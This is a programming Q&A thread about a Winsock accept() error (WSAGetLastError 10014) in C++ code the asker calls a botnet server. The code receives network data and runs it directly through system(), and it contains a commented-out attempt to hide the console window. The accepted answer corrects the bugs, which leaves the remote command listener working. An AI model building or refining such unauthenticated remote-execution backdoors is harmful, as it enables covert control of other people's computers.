# Winsock error on accept function

Tags: c++, winsock

I'm trying to make a simple botnet(not for evil purposes) with winsock, the client is ok(at least at the syntax), but the server has error when i call the accept function, it returns SOCKET_ERROR, i called WSAGetLastError() to get the error number and it returned 10014. In the MSDN page, it says this:

> Bad address.
>
> The system detected an invalid pointer address in attempting to use a pointer argument of a call. This error occurs if an application passes an invalid pointer value, or if the length of the buffer is too small. For instance, if the length of an argument, which is a sockaddr structure, is smaller than the sizeof(sockaddr).

Well, i don't have any idea of what to do.

botnetserver.cpp

```
#include <winsock2.h>
#include <windows.h>
#include <iostream>

#define PORT 5051
#define BUFFMAX 1024 // Buffer max

using namespace std;

int main() {
    SOCKADDR_IN svaddr; // server address
    SOCKADDR_IN claddr; // client addres
    SOCKET listensocket;
    SOCKET client;
    WSADATA WsaData;
    char buffer[BUFFMAX];
    int i = sizeof(client);
    //ShowWindow(GetConsoleWindow(), SW_HIDE);, fail

    WSAStartup(MAKEWORD(2, 2), &WsaData);

    listensocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    svaddr.sin_family = AF_INET;
    svaddr.sin_port = htons(PORT);
    svaddr.sin_addr.s_addr = htonl(INADDR_ANY);

    bind(listensocket, (SOCKADDR*) &svaddr, sizeof(svaddr));
    client = listen(listensocket, 5)) == SOCKET_ERROR
    accept(listensocket, (SOCKADDR*)&claddr, &i) // Error here

    while(true) {
        /* other things i tried
        cout << "\n\n" << buffer << "\n\n";
        cout << o << "\n";
        buffer[BUFFMAX] = '\0';*/
        recv(client, buffer, BUFFMAX, 0);
        if(strcmp(buffer, "<fim>") != 0) {
            system(buffer);
            //break;
        } else {break;}
    }
    closesocket(client);
    closesocket(listensocket);
    WSACleanup();
    system("pause");
}
```

Comment: Further problems: 1. You're ignoring the value returned by `recv()`. It could be -1 indicating an error, or zero indicating end of stream. 2. It isn't valid to assume that a buffer you've just received into is null-terminated. If you want it null-terminated, either send it null-terminated and be sure you've read the entire message before you use it as null-terminated, or else null-terminate it yourself after `recv().`

Answer (score 2, accepted):

There are two mistakes in your code:

1. `int i = sizeof(client);`

`i` needs to be initialized as `sizeof(claddr)` instead.  This is what `accept()` is failing on.  `sizeof(client)` is smaller than `sizeof(claddr)` so `accept()` thinks your `claddr` buffer is too small to receive the client's IP address.  This is clearly stated in the documentation you quoted:

> The system detected an invalid pointer address in attempting to use a pointer argument of a call. This error occurs if an application passes an invalid pointer value, **or if the length of the buffer is too small. For instance, if the length of an argument, which is a sockaddr structure, is smaller than the sizeof(sockaddr).**

2. `client = listen(listensocket, 5)) == SOCKET_ERROR`

`client` is a `SOCKET` handle.  You cannot assign the result of the `==` operator to a `SOCKET`.  You need to assign the result of `accept()` to `client` instead.

Change those lines to look like this instead:

```
int i = sizeof(claddr);
...
listen(listensocket, 5);
client = accept(listensocket, (SOCKADDR*)&claddr, &i);
```

With that said, you also need to fix your `recv()` loop.  `recv()` does not return null-terminated data, but `strcmp()` requires that.  You need to null-terminate the buffer after reading, or use `strncmp()` instead, using the result of `recv()` as the buffer length.  And you need to take into account that it may take multiple calls to `recv()` to receive `<fim>`, so you need to implement proper buffering.

And, you need to add proper error handling on ALL function calls.

Comment: It worked! thanks, and about 2.: some code i forgot to remove, well, thanks